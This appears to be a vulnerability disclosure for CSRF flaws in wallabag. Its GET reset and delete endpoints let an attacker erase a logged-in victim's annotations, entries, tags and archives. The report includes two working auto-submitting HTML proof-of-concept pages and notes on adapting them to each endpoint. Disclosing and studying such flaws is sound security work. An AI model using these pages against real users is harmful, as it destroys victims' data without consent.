I find wallabag
suffering several Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily delete the victim user’s annotations, entries and tags by the GET
request to /reset/annotations
, /reset/entries
, /reset/tags
, /reset/archived
, as well as /delete/[Entry ID]
, in which the [Entry ID]
can be estimated easily as it is indexed from 1
and increased by 1
when a new entry is added. The attackers can simply craft all these dangous actions in one link and then drive the victim to detele them all in one click.
For /reset/annotations
Login as a user.
Open the following HTML file in the browser.
// PoC.js
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/reset/annotations">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
For /reset/entries
, /reset/tags
and /reset/archived
, we can simply modify the above PoC by changing annotations
to entries
, tags
or archived
.
For /delete/[Entry ID]
Login as a user.
Find an entry ID, here we find the [Entry ID]=10
.
Open the following HTML file in the browser.
// PoC.js
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://example.com/delete/10">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
The added entry has been deteleted.